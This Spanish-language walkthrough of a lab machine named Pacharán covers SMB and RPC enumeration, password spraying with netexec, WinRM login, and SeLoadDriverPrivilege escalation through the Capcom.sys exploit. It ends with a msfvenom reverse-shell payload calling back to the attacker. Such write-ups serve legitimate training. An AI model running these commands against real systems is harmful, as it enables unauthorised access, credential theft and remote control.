Pacharán
Hacemos un escaneo superficial para ver los puertos abiertos:

Un escaneo mas exhaustivo solo en los puertos abiertos:

Viendo el servicio smb
abierto verificamos los archivos compartidos:

Al ver que tenemos lectura a NETLOGON2 entramos ver lo que contiene:
smbclient //192.168.1.42/NETLOGON2 -N
Adentro se encontró:

Comprobamos que el nombre del archivo Orujo es un user, además tenemos la contraseña así que verificamos sus recursos compartidos de igual manera:

smbclient -U Orujo //192.168.1.42/NETLOGON
Se encontró posibles usuarios o contraseñas intentemos averiguar:

Asi que con el mismo usuario y contraseña con rpclient enumeramos usuarios.
rpcclient -U 'Orujo' 192.168.1.42
rpcclient $> enumdomusers
user:[Administrador] rid:[0x1f4]
user:[Invitado] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[Orujo] rid:[0x44f]
user:[Ginebra] rid:[0x450]
user:[Whisky] rid:[0x452]
user:[Hendrick] rid:[0x453]
user:[Chivas Regal] rid:[0x454]
user:[Whisky2] rid:[0x457]
user:[JB] rid:[0x458]
user:[Chivas] rid:[0x459]
user:[beefeater] rid:[0x45a]
user:[CarlosV] rid:[0x45b]
user:[RedLabel] rid:[0x45c]
user:[Gordons] rid:[0x45d]
Los vamos a meter en una lista.
Y con netexec vamos a ver que credenciales coinciden mediante smb.
❯ netexec smb 192.168.1.42 -u users.txt -p ah.txt
Y si hubo una correcta entre todas:

Obtennos un usuario y contraseña y volvemos a enumerar con rpclient:
rpcclient -U 'Whisky' 192.168.1.42
Al enumerar se encontró con el comando enumprinters
una credencial:
rpcclient $> enumprinters
flags:[0x800000]
name:[\\192.168.1.42\Soy Hacker y arreglo impresoras]
description:[\\192.168.1.42\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
comment:[Soy Hacker y arreglo impresoras]
Nuevamente utilizamos netexec para ver con que usuario de los que enumeramos anteriormente funcionan con esta contraseña, pero esta vez por winrm.
netexec winrm 192.168.1.42 -u users.txt -p 'TurkisArrusPuchuchuSiu1'
Se encontro un usuario valido:
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.1.42 5985 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)
SeLoadDriverPrivilege,
Entramos por winrm y vemos que tenemos el permiso SeLoadDriverPrivilege, el cual tenemos la explicación de dicho privilegio en este articulo.
❯ evil-winrm -i 192.168.1.42 -u 'Chivas regal' -p 'TurkisArrusPuchuchuSiu1'

Nos vamos a crear una carpeta temporal y subiremos los exploit que tenemos para abusar de dicho privilegio.
Descargamos los archivos a la maquina victima:
upload LoadDriver.exe ....
C:\temp> .\ExploitCapcom.exe LOAD C:\Temp\Capcom.sys
Al ejecutar este comando nos tiene que salir: NTSTATUS: 00000000
[*] Service Name: kqyumyoz
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\???????????????????
NTSTATUS: 00000000, WinError: 0
Después de cargar exitosamente Capcom.sys ahora podemos ejecutar cualquier comando como usuario privilegiado con la palabra clave EXPLOIT.

Pero lo haremos con una reverse shell para tener todo mas dinamico:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.34 LPORT=4444 -f exe -o rev.exe
Lo subimos a la maquina victima y con el comando:
.\ExploitCapcom.exe EXPLOIT rev.exe
Nos regresa la conexión, estando en la escucha en el puerto dado por el .exe:

Last updated